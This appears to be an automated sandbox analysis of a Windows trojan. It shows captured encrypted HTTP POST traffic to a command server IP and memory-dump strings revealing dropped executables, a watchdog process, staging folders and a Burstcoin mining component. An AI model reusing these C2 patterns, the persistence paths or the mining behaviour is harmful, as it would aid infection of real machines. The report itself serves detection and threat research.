qioumj=p3arNI0y53ADnyrNuCvzA1+6FcDE+NV3HnKikxYrDTMhrFvTrYunZT9wvozaSh5oj9/SyZsxaWVyktzFod1rZABP2MOgDBsaDzXyc9AvZCd+p9nm45Im+E8fywb35mSX/4yeZdOGON6PcQym4IllVv7D+UItZLd/n3FTK3/k0mjd535wLjXYPFG8ufTigg2h2S0IkyUWdhvtCW9UW7hnct7pbGPizmBlK3eu6ggVs7Tyv48SnQUTQpHITvoooTIvzuwiVZVgd/wajNwtVlOBRZKuEn0MhlRos1H3qomWYLEpnkcL/Mj6XsNMKHQBGUtoFrF96IQIaqweL/eUAd+slL33T5r4XFeZwwRYiI1ubZmIGONRQsGuk4SSk7qaht6fPoWclqFFkbuQGoqcDE6WGZlEENJvD9Czwqu3joWYgJrGDoWJqPWzPCXRueF1QzENYMXvZlGigFS/PLzO75SRqu9KnpAkqxCFdN7bgPQMPiNNmlsDDKwmqDvU
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
..U......p...e...&....~..
GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
.H.......T..t.gs:..9j.....Y lY.).......A^=@..n........43..J.H...Ln....2|....%QzT.{T.S.......R......U..k.Y.v.bu.'...Z]=f.i`._.m. ..%.i.......?.Y....p$....p'...K.!.MV.D...../&`...N/L1...VJ.M.t.r...ZP....../q....Yk......A...A. .....&...&W..U..O2).Arp{Q...S...|.Z...c..J.5aO.(x..8...3p.4.....qc.H%.. .Z%1=.gy.V.k.$.~V..1A.O...........A.R.;.:...c..X..........(=.oD..h....E...)..a>ps....L...uC......0hA.;..Nt.h\..>....s{.....9^..=.0.yWC.HYZ,..../....w.......6....Kf.I..r.`..)X.........1:..>.....x..q...8....K.q/R...'...x.=..bI.f2....>..a^'...F1.....0..E6...`,W..).........Oe._....T.E.R../.|6...#...:.G78.B....;E...<d :%.]Y_.E1...8......b}V..6.......J"....qo$.l.o..... t.....j.8.=.|.{....9...sh........\.........:P.......^..w.....aA[d.....B.{c.^e.V..]N..'HU.....od.^.;.l.<.;.Y"....h...D.....EE..Q..jI,f.<Vy.....w*...... ...5`....S....@....&1....z..$.<...[Y\:p._.....'...%./H..^`.7p.w..(..*.e#..C ..v...,.5..q....9...WzV..#^..W?...(z\\.C...'.|nJ...7.u.....5_..%^KM.)...1.I.025.!..1g.......S......e.!.Il...........bB...X...h...#.....H.....].h....p.-.>VM.Pe}.^!2...r....s'..........k.E.6.7..7k..B.......L*.kn.{.^I..eV.....b..^......UUVe...^.....].........O ...'...,....p.c.K..d...w.j...i..#X../c...[r.......>6.........o.]~.e.C.......7(cN......;(....;.1..a..U.B..)).c....{OX.0..S.Yo.#.$.9........i.T)9#..>m....M..su.d&...
POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
qioumj=ZKBHmELlC9yn3REmvfpudkMs23onQ7IqFagRPSl9VORwWPc4R81xkIo+Vfaxi2vVgWpoF2viNAq7g3LyYTG8/5JZM46t0u48bBSI4CKI2e7jvQeCckFJSgaO/N9n0v97+crTE04YHuUg7p87OY2smLglnaXk+A==
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
.z L..o...ecI;.V>^.a....p...}../..}..kI...a..Sz.).jU..a.`5....@.....Q(..........~@I.Y...k..8...K.>B.-..........S....z...\.O.1..G....Ze...P..G..F..Go3~..a4ZEzJ....VQ....N.U..**j.}......O.D~.zU.a.".....4f.........l..7Q.Z....#..ocwr...N...<`..h.....M..}.............i.%.M.{.....W8N...D`.9f.I&.....S.6L/..^.Y.i.l.'.>..@....z.x..............')*.X.(.......#. ......R%?... ..M-.X...1........i%.......5W^..a.7..>.l.PRHo.4.L~.xPW._u.7~.my....$hw. -......zL.$..F.".@@.....}.=..D:..eS.}.U.&,..../.Y.u..e..Tm...4...J. ....J...Y.b.........f.T...Y.<...g8..=a.~4w............D.l...6....<.....['..!.l..[. ..`.v......(1#w........d..8.0Z....q.O.z.R.O.H.p....Z.;b,..eTx....#...:?.,.<g..:XT3 hP....._.K.....%..f.}..V.<u.4@.#.;~X...C.....B........Cu.....2.s.TD.....:..U...&.g.F...'........-.%...Jf........_.{._.V.c...[.....4.............!..(.Qo.jC\X.0.p......"....y[..Q............ .4.m.}%.&...>E..g..)JKm7...h\.?..i.m......&...{..X?..g.G#..6.f.B...3.....8Y1l.....,`...p...Y0ilQdC....V2....Q6F... .p.<ce.....a$...F ?..5..>...f....y..[.j.G....n^g.....`.]..D...A.../..-#.#G...%..9^d.@.c$...in.c...H......'PS..HT....0X....@n-.3yr..T.S.[i..6....S1:...j)..Z.3......h...l.l7q..G.%.|'5..3D......k..LSU.......$.5....u.....A_|. ....p.cm.E0........U..e..A.R. ......8....Rt...Z....<.@GZmu[Aub.H.4...o/.<l1J....=8..G.n.f#Dr>(..qd..c..ns.4.....%..o..g.<.&.(..6!,....'P.........=.j......FU.L;.~T.....u..[sg.....4....7..T..).....$.0UnI.7q..*2.....8R#&ZPD.`...4....Q.......6.EE...4P,.....`.{.f4..Y...c.x.,.....Z..c;..Q~..>
<<< skipped >>>
POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
qioumj=yUhCgBwNDsRt3RAgg9ds9Y6TdCAsYmxL8rNzNB5abGysoO5+k0Ju52vzBiwyMPWd9Tcw9sRSFF/aYzRHnwQ0r5dXZ3uoQrIAbe0u4bpzke+H/bkABo8n4dWlbZBceqhfG8IhWWAFG6tpJPcgzXjv3qKoWWPE9cAUHpupJnwFUTpgs0Fomw==
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
c.#@ .m........HX].$u#...3.......2@... A]T...XH..o$h...4.|...6.M.r.&..A..Q...:...yi.W.`.q8..O.*Du.... .".i.....=....j..4a..oh.;.....g.M.`.....V@..9b)........d.f'....W.Y(...S.AV.. ..L.....j&.$5.....4Y......Se......\..j.i.p?5x...<5.....&O...'.....t.I....z.xR..<)*.....LJ..'.A..R..I..@.T.tR*..).....8.J....Bb.R!k:....T.ol*..m..Z..q.q.8V.B...!..C......"......p..q...8.M^..{U.........}x...`..'.p./.....8.K"A.....R=.}./...6._.ej/.......K.....>xP.B!.{.l.=.... .u.....<z.3.........~z..S?o....K...9........4y{...}...?.uo/....l....D.......,{.....c.^@../`.&d.7..h...4&...d..ML..&.s@...........h...4.....MOM..M&........}3`..bIb....op..7.....j.......M}.r......pw.o8C.7......u.g...3.........cpF..8#.......HeWg$.]3..5..Vx.d.gF2..#..`..r.HFz.$#..........d.\j2..c.AAy..|.F...#h.K.4e....... ..F..A#.>..._....h.K.4........x..F.%H#^.....?.W....8......jh.x5s?....^......XWc...1.L....j...5F.[.#..........cdjz1.'..Y......F..<#k...5......d._.....Y....A... GMk..I5....D...".......H.XA$.. ..N.I.o.$..D...".39...5H...$y...<b.I.Y($.l@...V.C7..!......yH.K<....R.h.*..@P.eC*..4..3...\H%'....M..~0L..y....*a...$=.Jp..%L=:#fB...U.a*..I...u...T.. ..:}........S...Lsa.....>..b]...........~h...'.#.@fq..6d|..9.?!.?...w._vO...'t.O..q.K...|G.rB@.....(...c....PP.OF.LBq../reOX.7...Na...bs..X.H.D.?~!G......u.........p.....].-$....$._...`m........C...x.~q.LK.K^?.#..b.t...A.kT .%d..Xe5y.0......[..>.....B.O..J.......'.....x.....n.....(....J?.^M'<?.....;\O.zK$.E^.......|....1.v?........7.....F.~....{.....1..%..B.3.....\{.^7{. .S...M}..ab....
<<< skipped >>>
POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
qioumj=p5Ox6XzW/a1dKWy6N4pSuPjD6wYOhSNYI3PUPQ5Sv+g4IoQy3HUZwqgH3yPbb7TYWOkBsKW8RAX4hm0IYCe+af7DKXUN8ZpnccwwMz8gxHF+eKC9JCsYs3P0CK6thlUoFRJJCctgIG9NSnf9jxInpieHvVKR7vaFPJbGtSFuQMoL4EiG3pY6iEKpsw==
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
?..t...0f.5....nv.]9.T.......Q...*{..k.<.e........R....*.F-._...u.a.=./.:*:L.nln...95...O...$..DM.k&.a..V..@F%1.eO...#c..aF..\~.&Z.(&.6..... p....E....2...xh..f:..V.IQ..#..OW...9.p..ul?.......3..}..?)..E&.M#".)..g.M.._kx.(E..oS...\c...B.~^7..H.....{....8^.1 ./.....\UZ..k.....e0. ,...X..7$r.......a..t....5DE....g...|G`}M..^I.9.........u?.5.omC.S....E.'7.k".v.......m..........F...C,..U^;..vY..t`.wK.|....&i..L*.J.n...P..a...e=A...tj..{.(w..Y.G-6..t9.V...Z?...`..<..'.m...R..E.....b....I?..L...[hL.x.]....t$Z=..cP...8....L`3...J....,Q.. ,..}....??S..Xr..gl.... .!.D..wJ.0.H..D.[7...x6.......;.z8B.........;H;..tY...lp....(..B/..m..~G......2:"3.HXQ.Tf.3..W/.....|.....K.[20.A....$....1CD...<$k....4.."[.1_..?.)$t.....b... 1....{.aC..J.:..z9...8W ...........78"...3...........(e.D.,&...|.0..vf.EHzB..-..NZ.3.`x....NV..r-.....Y...]h.2.g...I[.B.D..1.......x._.m.......aeU...0.Wi...a.*iB...[$'........{.";..A.5SS......?;.b...&..Z..D...d...3c....U........ H'[..).az....^...Vy.>a>.vd.....3.y.6*...`#..d.`.':t.P....h.....D0...R..]b.;.......[.[....$...\..4...#.U.....hVJ.....=99........v..5..<=.i~!.:.v.?..#.2~..... #..C=u?.,..Y2.R..j..o".O.]}.X....U...N.:;..d"....X.....^E........N&..."o....p5...\... H..~.s........Zb}.m@.{QI4$S.].......7f....#..-....mt.p....;v2.=..#.UD/...C1M.J> .~..-c.....9..)r...l4.A.C85.....{..."..t$X.3......$.}...I..j....v.K.(h._....J.....>k...Z.{ ..Nj...F6.[M,.(...71w!...kK(g.P..o.!...D.a..NT...2.b..!.sQ.L*..w@...X.3...sb..t"ydVuDcYo.?...i.ocF.g.q-.......e..7a..R.%./f.....(..J.]U?0.C..w...7..
<<< skipped >>>
POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
Content-Type: application/x-www-form-urlencoded
Content-Length: 283
qioumj=9EhCgBwNDsS+3RAgg9d79YrLZTpyLWpUtbdka0VQcHz4u+Zr3EQh7mbzHQgzIPXMrgph+/EAVg3BRF8d2xU+t5oBM33iMdJzKt1qoOB6kI699PtMCPJRgLGwfKMxbfcDWdRwRXsOAO1ydaR+g2+6yeyhUWqD+4RIHo3/eHwaHn578RB31er/PynbHk5opO/EnyRgZkqORlRaMCS2T/5n9UpCfVIY0jKUzn88aQ4nstwjgnBwwn9Nlg==
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
cJ!@ .m."C.0R........
POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
qioumj=y4iEnx3NyNu8feFng4+U1qK/iDFqDpJDSsoMMOKCU25Ex611DKf7rGcdF+e7p9eFhzw2CEfyEQiVQWW6qOVzc6oLZMQBibLjjOOxhgPo3UWY9APTZZ92EgIexPcxlH/l04LUB902oAhj3Ih+IhtFqxkMjvtNazCRH1SIgWYzp0XFbRhL9KI=
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
...../.........Y.1.K..~...?.y...S....t.........se.,8.r.4..CN.2..7.......q...../.5.A<2~..{.Z....k4 F}...3..t.a...gM].RV..dw...(DE......b..b..J.H....g..m.!.{.N.C*..2lE5v.;.......`#......pe......_[.}.. ..P..Koc...4...&K0]H%.u.....h.s..e1............4..4..[2...g...e.B_7..c...v{......I".....E.0..[I-.T8.CAn.....D...b.<6>2.ID..<5!.............t...h.t..H9.yf...N1.Y#..kH..It.....h5aD.~.j.......~L..c=.T."..oS.O_.L..2..i/.`..7.g.....#.4......$..[F..lm-..m...a..bK..........0?..g.......xW...NA....$.0I.....ep.<... I ..Vu..`.5..@1.v....o.Y..L..y.....k.d.*..u..*y...yo..f....{.l9....e.5.......\......Bp.)cgGjQ...a6@u..a....0.(..^^$...=u..J..p.0.^....T.e..R3cd.....l...k..)BX1.A...p..D.....8h......Fm...=..../.af...0...]......P..gg.qi....T..w7......xvXH......C.h...\.Q.u.........J(..D.x.>.2..a..[x..v....(.O~..8 ...M.O..........6...m.7.C<\,...H...h...'V.@(.v..6.F.e..*.M;?'.8"O.#..\..;._.:.....I(?.5........%pp>SL.l..A=.6.k...!...#x..x.G...}....ain.J...E.<?@qR'................./.P.X..X-....E.nFsG.............8.5D.6....].......6"7y..o\..^...].~.... o..g......xJo........K.4r..W.A.S.W.r.fO....D....7....!..w\`NH$.j.1V._3.L...U.%..=(..d....'....JQe)gN..w..... .8...D.N.....W.......xl...|6.X*..V....V.I..N...~..`..Z.. .^.....w...g..?P..4.D.jc.....Q.M8..'a...ID.%8`.]_C....-......G.$(.`2.s-.....gN.T..UB....4%^B.....{...G.d.J..uUB.@8>..7.mI.eY.....~<....Q4...s6>0....e.O...b_..A..a..=lf"{........s.~...d{.....8.....P%...bw......._...25..t........y.a\.....}n.......].....C.F..qC...)..0?.c...V...._%.b>}h..O..BG.
<<< skipped >>>
POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
qioumj=CzJujS53Iskq91ujPLPMPWbCpsDwRA04XBoTR5U4f6hbxPVsi1R2EgNBheGmyWx8md3Lkp+eZHQ5pkVby6iksvraI67hVmo2J6LLe6GAeyqaucjjVbBvdqeQTc5FibKp4qz3WAbbFwnLzUIoHwIkvQGD+6uj
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 09 May 2016 06:19:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.14
.V.F....M..6.....:,t^.R*.o.....d.Xq.......si......dd{.........h..|A....]..gw......=4..O........FR.G...@E..|.x.....~..g...........}U...'.....GX..Q.....S..@..~.4Tmc.=...v............l1...6M..2^...|."...|..9.9....D....*.......ry.T..=.q_.0Og...th....po...... .......cA]h.......T....E..f.5....<......B.........e).......u....nx(d.a........R:}......j|..).o.q.......!4.i"i..c.....j]&.B...>..6M..f..p....A........T.M,y....Ol....x.O....x!....h!..^[y.%..F[.......%.'..<..4)v...|5.{...,1......)\c....^T.X..k,.p5..2...o..{.....m..i....y.)...)..?..y..#d>p......t#.@X....d...s;!.I..?w.w.l/.L.M=....F.......qc..H.;..9..3..u.@0.....C./C..h..4z..`o#L#.....Y.za.....\@.....H7.h2qqW.8.cL.K.&.....j......<T......p..8......|.. ....m...6y.Q..^.....6.........._..j.|z.HC...E^o.......[\......R..z.$E.....j.}o%....e&[......iF. *.a...0..>....L...&.....Z.....D.Qa.|.0....h.%L...&.b..mM..6..D.4..M...&..h....I..b.W.-.>.6.G..d..MR..rXXN....IV..$.Z.... .j\.d.....OG-..4~..~V.!........pjU$..*..Z.nq..&.x79..CA....).(..U..j*....9.V....EN.Ob..P.7.p...B.x.br:..9..*.<.^N...... S.)_....T...*............?.k..-1.O.....y.S.).....T9d.*..?..\.J~.O....R..S......eTj..*....Z..J-.W..O}R.....~..b..j1':....Z...-..i.c*/.1.,..V.b...1F.;......5.....c.`.1.(x.}dP.>.ZF..s..q...:...{^.a.l....}..4>l.k..q..[9....\...*ak;..5......lM...&..[......H..0*k...5y......M^..&/1L.......J.E..... y.. ...e^.../zs}.=0w...SEO.........<...t.t..z:S.=.:.....OGt..#M....o...At...:....q...8^kG..d#N.......S./........q...8....z$.N=.w..C.S..`.....n......t.2.z..V-O7...7...=7.
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
abhdqfjyr.exe_1364:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
'0ß
'0ß
.mlWj
.mlWj
]_%sK
]_%sK
SSSh0
SSSh0
B=>j%f
B=>j%f
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
GetProcessWindowStation
GetProcessWindowStation
portuguese-brazilian
portuguese-brazilian
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
GDI32.dll
GDI32.dll
GetKeyboardType
GetKeyboardType
USER32.dll
USER32.dll
GetCPInfo
GetCPInfo
PeekNamedPipe
PeekNamedPipe
zcÃ
zcÃ
|%System%\qtvtnsadc.exe
|%System%\qtvtnsadc.exe
q185.106.120.168
q185.106.120.168
wWATCHDOGPROC "c:\windows\system32\abhdqfjyr.exe"
wWATCHDOGPROC "c:\windows\system32\abhdqfjyr.exe"
%System%\abhdqfjyr.exe
%System%\abhdqfjyr.exe
00f0r0x0~0
00f0r0x0~0
= ='=-=3=9=?=
= ='=-=3=9=?=
7w7F7N7T7h7n7{7
7w7F7N7T7h7n7{7
8Â8X8b8h8r8
8Â8X8b8h8r8
5P5C5U5m5v5
5P5C5U5m5v5
2%2F2X2f2v2
2%2F2X2f2v2
9•9F9Q9W9e9n9t9~9
9•9F9Q9W9e9n9t9~9
2/2O2Y2d2m2u2
2/2O2Y2d2m2u2
8"9(9/959
8"9(9/959
3!3*303:3
3!3*303:3
9–9D9T9Z9c9o9y9
9–9D9T9Z9c9o9y9
5!5'525=5
5!5'525=5
9â€9D9J9R9k9
9â€9D9J9R9k9
11D1K1X1c1w1
11D1K1X1c1w1
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
mscoree.dll
mscoree.dll
ADVAPI32.DLL
ADVAPI32.DLL
KERNEL32.DLL
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
ke7qslsbgtc2eo.exe_384:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
'0ß
'0ß
.mlWj
.mlWj
]_%sK
]_%sK
SSSh0
SSSh0
B=>j%f
B=>j%f
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
GetProcessWindowStation
GetProcessWindowStation
portuguese-brazilian
portuguese-brazilian
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
GDI32.dll
GDI32.dll
GetKeyboardType
GetKeyboardType
USER32.dll
USER32.dll
GetCPInfo
GetCPInfo
PeekNamedPipe
PeekNamedPipe
zcÃ
zcÃ
%WinDir%\TEMP\ke7qslsbgtc2eo.exe
%WinDir%\TEMP\ke7qslsbgtc2eo.exe
00f0r0x0~0
00f0r0x0~0
= ='=-=3=9=?=
= ='=-=3=9=?=
7w7F7N7T7h7n7{7
7w7F7N7T7h7n7{7
8Â8X8b8h8r8
8Â8X8b8h8r8
5P5C5U5m5v5
5P5C5U5m5v5
2%2F2X2f2v2
2%2F2X2f2v2
9•9F9Q9W9e9n9t9~9
9•9F9Q9W9e9n9t9~9
2/2O2Y2d2m2u2
2/2O2Y2d2m2u2
8"9(9/959
8"9(9/959
3!3*303:3
3!3*303:3
9–9D9T9Z9c9o9y9
9–9D9T9Z9c9o9y9
5!5'525=5
5!5'525=5
9â€9D9J9R9k9
9â€9D9J9R9k9
11D1K1X1c1w1
11D1K1X1c1w1
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
mscoree.dll
mscoree.dll
ADVAPI32.DLL
ADVAPI32.DLL
KERNEL32.DLL
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
win32blot2.exe_1920:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
kernel32.dll
kernel32.dll
%srecyclebin\ver2
%srecyclebin\ver2
%srecyclebin\*
%srecyclebin\*
%srecyclebin\%s
%srecyclebin\%s
%srecyclebin\*_*_*_*
%srecyclebin\*_*_*_*
%llu_%llu_%u_%u
%llu_%llu_%u_%u
%c:\recyclebin\%llu_%llu_%u_%u
%c:\recyclebin\%llu_%llu_%u_%u
%srecyclebin\%llu_%llu_%u_%u
%srecyclebin\%llu_%llu_%u_%u
%srecyclebin
%srecyclebin
Adjusting total nonces to %u to match stagger size
Adjusting total nonces to %u to match stagger size
System.PercentFull;
System.PercentFull;
Registry key TileInfo changed!
Registry key TileInfo changed!
Registry key PreviewDetails changed!
Registry key PreviewDetails changed!
%s\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
%s\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
win32purst2.exe
win32purst2.exe
%s %s %s %s %s %s
%s %s %s %s %s %s
GetProcessWindowStation
GetProcessWindowStation
operator
operator
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
KERNEL32.dll
KERNEL32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ADVAPI32.dll
ADVAPI32.dll
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
zcÃ
zcÃ
%System%\p2p_04\win32\win32blot2.exe
%System%\p2p_04\win32\win32blot2.exe
mscoree.dll
mscoree.dll
@kernel32.dll
@kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
yac32sse41b.exe_1968:
.text
.text
P`.data
P`.data
.rdata
.rdata
`@.bss
`@.bss
.idata
.idata
libgcj-13.dll
libgcj-13.dll
ADVAPI32.dll
ADVAPI32.dll
ws2_32.dll
ws2_32.dll
wsock32.dll
wsock32.dll
127.0.0.1
127.0.0.1
operator
operator
operator
operator
global constructors keyed to
global constructors keyed to
global destructors keyed to
global destructors keyed to
operator""
operator""
_matherr(): %s in %s(%g, %g) (retval=%g)
_matherr(): %s in %s(%g, %g) (retval=%g)
VirtualQuery failed for %d bytes at address %p
VirtualQuery failed for %d bytes at address %p
VirtualProtect failed with code 0x%x
VirtualProtect failed with code 0x%x
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
Unknown pseudo relocation bit size %d.
GCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)
GCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)
_acmdln
_acmdln
_amsg_exit
_amsg_exit
KERNEL32.dll
KERNEL32.dll
msvcrt.dll
msvcrt.dll
WS2_32.dll
WS2_32.dll
win32purst2.exe_1492:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
GetProcessWindowStation
GetProcessWindowStation
operator
operator
kernel32.dll
kernel32.dll
recv = %s
recv = %s
POST /burst?requestType=submitNonce&accountId=%llu&nonce=%llu HTTP/1.0
POST /burst?requestType=submitNonce&accountId=%llu&nonce=%llu HTTP/1.0
%c:\recyclebin\*
%c:\recyclebin\*
%c:\recyclebin\%s
%c:\recyclebin\%s
Error opening file %s
Error opening file %s
(ws2_32.dll
(ws2_32.dll
|wsock32.dll
|wsock32.dll
127.0.0.1
127.0.0.1
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
WS2_32.dll
WS2_32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\p2p_04\win32\win32purst2.exe
%System%\p2p_04\win32\win32purst2.exe
5#6-676=7
5#6-676=7
"0(0,00040
"0(0,00040
5!5%5)5-5155595=5]5
5!5%5)5-5155595=5]5
5 5@5\5`5
5 5@5\5`5
@mscoree.dll
@mscoree.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
ke7qslsbgtc4eo.exe_1128:
tGHt.Ht&
tGHt.Ht&
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
operator
operator
ADVAPI32.dll
ADVAPI32.dll
127.0.0.1
127.0.0.1
C:\recyclebin\recycle\lock
C:\recyclebin\recycle\lock
C:\recyclebin\recycle\last
C:\recyclebin\recycle\last
C:\recyclebin\recycle\upload.txt
C:\recyclebin\recycle\upload.txt
C:\recyclebin\recycle\post.txt
C:\recyclebin\recycle\post.txt
C:\recyclebin\recycle\ofs
C:\recyclebin\recycle\ofs
XMLHttpRequest_POST
XMLHttpRequest_POST
spawned: '%s'
spawned: '%s'
can't spawn: '%s'
can't spawn: '%s'
%WinDir%\TEMP\ke7qslsbgtc4eo.exe
%WinDir%\TEMP\ke7qslsbgtc4eo.exe
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
.text
.text
`.rdata
`.rdata
@.data
@.data
!"#$%&'(
!"#$%&'(
.tx%#
.tx%#
KERNEL32.DLL
KERNEL32.DLL
WS2_32.dll
WS2_32.dll
mscoree.dll
mscoree.dll
ke7qslsbgtc4eo.exe_1128_rwx_00401000_00018000:
tGHt.Ht&
tGHt.Ht&
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
operator
operator
ADVAPI32.dll
ADVAPI32.dll
127.0.0.1
127.0.0.1
C:\recyclebin\recycle\lock
C:\recyclebin\recycle\lock
C:\recyclebin\recycle\last
C:\recyclebin\recycle\last
C:\recyclebin\recycle\upload.txt
C:\recyclebin\recycle\upload.txt
C:\recyclebin\recycle\post.txt
C:\recyclebin\recycle\post.txt
C:\recyclebin\recycle\ofs
C:\recyclebin\recycle\ofs
XMLHttpRequest_POST
XMLHttpRequest_POST
spawned: '%s'
spawned: '%s'
can't spawn: '%s'
can't spawn: '%s'
%WinDir%\TEMP\ke7qslsbgtc4eo.exe
%WinDir%\TEMP\ke7qslsbgtc4eo.exe
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
.text
.text
`.rdata
`.rdata
@.data
@.data
!"#$%&'(
!"#$%&'(
.tx%#
.tx%#
mscoree.dll
mscoree.dll
KERNEL32.DLL
KERNEL32.DLL
qtvtnsadc.exe_628:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
'0ß
'0ß
.mlWj
.mlWj
]_%sK
]_%sK
SSSh0
SSSh0
B=>j%f
B=>j%f
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
GetProcessWindowStation
GetProcessWindowStation
portuguese-brazilian
portuguese-brazilian
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
GDI32.dll
GDI32.dll
GetKeyboardType
GetKeyboardType
USER32.dll
USER32.dll
GetCPInfo
GetCPInfo
PeekNamedPipe
PeekNamedPipe
zcÃ
zcÃ
%System%\qtvtnsadc.exe
%System%\qtvtnsadc.exe
00f0r0x0~0
00f0r0x0~0
= ='=-=3=9=?=
= ='=-=3=9=?=
7w7F7N7T7h7n7{7
7w7F7N7T7h7n7{7
8Â8X8b8h8r8
8Â8X8b8h8r8
5P5C5U5m5v5
5P5C5U5m5v5
2%2F2X2f2v2
